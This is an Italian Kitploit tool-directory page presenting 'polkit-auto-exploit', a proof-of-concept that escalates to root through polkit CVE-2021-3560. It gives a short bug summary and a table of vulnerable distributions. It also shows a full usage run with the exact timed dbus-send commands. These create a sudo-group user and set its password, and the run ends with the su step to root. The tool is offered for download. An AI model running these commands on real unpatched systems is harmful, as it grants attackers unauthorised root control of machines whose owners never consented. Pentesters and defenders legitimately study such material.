Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
polkit-auto-exploit — PoC di sfruttamento automatico per Polkit CVE-2021-3560 | Kitploit
Strumenti/GitHubGitHub/aancw/polkit-auto-exploit
Autenticazione e AutorizzazioneEscalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration Testing
GitHubaancw/polkit-auto-exploit

polkit-auto-exploit

PoC di sfruttamento automatico per Polkit CVE-2021-3560

Vedi Repository
54 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

polkit-auto-exploit

PoC di sfruttamento automatico per Polkit CVE-2021-3560

Riepilogo

CVE-2021-3560 è un bypass di autenticazione su polkit, che consente a un utente non privilegiato di chiamare metodi privilegiati tramite DBus. In questo exploit chiameremo 2 metodi privilegiati forniti da accountsservice (CreateUser e SetPassword), che ci consentono di creare un utente privilegiato, impostare una password, e infine accedere come utente creato e poi elevare i privilegi a root. https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/

Utilizzo

root@kitploit:~
ubuntu@ubuntu2004:~/polkit-auto-exploit$ ./polkit-auto-exploit -u adminhs -p admin1 -f admin
[===] Auto Exploitation PoC for Polkit CVE-2021-3560 by Petruknisme [===]
[+] Current User: ubuntu
[+] Variable for Polkit Configuration
[*] Username : adminhs
[*] Password : admin1
[*] Fullname : admin
[+] Sending create user command to determine time execution
[*] Execution time: 0.018076ms
[+] Time to killing dbus-send setting to 0.009038ms
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:adminhs string:'admin' int32:1 & sleep 0.009038s ; kill $!
..................
[+] GOTCHAAA! User adminhs is created with sudo member group
[+] Getting UID from user: 1015
[+] Creating password with OpenSSL
$5$wwCpZi2.onsiKa6b$B/OovlhfvFWs65EdYnk/1sL.sYSzfPXd1s6ZpurHNr0
[+] Triggering polkit to create password for adminhs
dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1015 org.freedesktop.Accounts.User.SetPassword string:'$5$wwCpZi2.onsiKa6b$B/OovlhfvFWs65EdYnk/1sL.sYSzfPXd1s6ZpurHNr0' string:admin & sleep 0.009038s ; kill $!
Failed to execute command: echo admin1 | su -c id adminhs
uid=1015(adminhs) gid=1015(adminhs) groups=1015(adminhs),27(sudo)

[+] GOTCHAAA! Success login with User adminhs & password: admin1
[+] You can login to root using su with user and password created before: su -c 'sudo su' adminhs

Testato

  • Ubuntu 20.04(policykit-1/focal,now 0.105-26ubuntu1)

Informazioni

Qualsiasi sistema con polkit versione 0.113 (o successiva) installato è vulnerabile. Ciò include distribuzioni popolari come RHEL 8 con polkit versione 0.115 e Ubuntu 20.04 con polkit versione 0-105-26 (fork Debian di polkit).

Distribuzione vulnerabile

Licenza

Licenza MIT

Scarica lo strumento
DistribuzioneVulnerabile?
RHEL 7No
RHEL 8 Sì
Fedora 20 (o precedenti)No
Fedora 21 (o successive) Sì
Debian 10 (“buster”)No
Debian testing (“bullseye”) Sì
Ubuntu 18.04No
Ubuntu 20.04 Sì